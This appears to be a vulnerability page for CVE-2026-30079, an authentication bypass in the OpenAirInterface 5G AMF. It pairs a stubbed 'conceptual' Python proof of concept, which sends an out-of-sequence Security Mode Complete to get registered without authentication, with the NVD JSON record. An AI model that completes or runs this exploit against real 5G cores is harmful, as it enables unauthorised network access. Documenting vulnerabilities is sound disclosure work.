CVE-2026-30079

# Conceptual PoC for CVE-2026-30079 # This script demonstrates the logic bypass using a simulated 5G NAS stack import socket from scapy.all import * # Note: Requires Scapy with 3GPP/NAS support or custom NAS packet builder def send_nas_message(msg_type, ue_ip, amf_ip): # Function to send raw NAS message over SCTP/NGAP print(f"Sending NAS Message: {msg_type}") # Implementation of NGAP/NAS packet crafting would go here # ... def exploit_cve_2026_30079(target_amf_ip): print(f"[+] Targeting AMF: {target_amf_ip}") # Step 1: Send Initial UE Message (Registration Request) # Normally contains SUCI or 5G-GUTI nas_pdu_1 = build_nas_registration_request() send_ngap_initial_ue_message(target_amf_ip, nas_pdu_1) print("[+] Initial UE Registration sent") # Step 2: Send Security Mode Complete out of sequence # Normally this comes *after* Authentication and Security Mode Command # Sending it now triggers the state transition bug nas_pdu_2 = build_nas_security_mode_complete() send_ngap_uplink_nas_transport(target_amf_ip, nas_pdu_2) print("[+] Security Mode Complete sent (Out of sequence)") # Step 3: Observe response # The AMF should reject, but due to the bug, it accepts. response = listen_for_ngap_message() if "Registration Accept" in response: print("[!] EXPLOIT SUCCESSFUL: Registered without authentication!") else: print("[-] Exploit failed") if __name__ == "__main__": # Replace with actual AMF IP exploit_cve_2026_30079("192.168.56.101") # Helper functions (pseudo-code for NAS packet structure) def build_nas_registration_request(): return "NAS_PDU: Registration Request" def build_nas_security_mode_complete(): return "NAS_PDU: Security Mode Complete" def send_ngap_initial_ue_message(ip, pdu): pass def send_ngap_uplink_nas_transport(ip, pdu): pass def listen_for_ngap_message(): return "NAS_PDU: Registration Accept"

{"cve": {"id": "CVE-2026-30079", "sourceIdentifier": "[email protected]", "published": "2026-04-07T15:17:38.267", "lastModified": "2026-04-14T15:45:37.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In OpenAirInterface V2.2.0 AMF, Out of sequence messages causes incorrect state transition during UE registration procedure. This allows authentication to be bypassed completely. If a SecurityModeComplete message is sent after InitialUERegistration, a registration reject is received followed by a registration accept! This leads the UE to be registered without proper authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openairinterface:oai-cn5g-amf:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "1BB4900E-B5A7-40ED-8DA6-4E372D5036D9"}]}]}], "references": [{"url": "https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/77", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}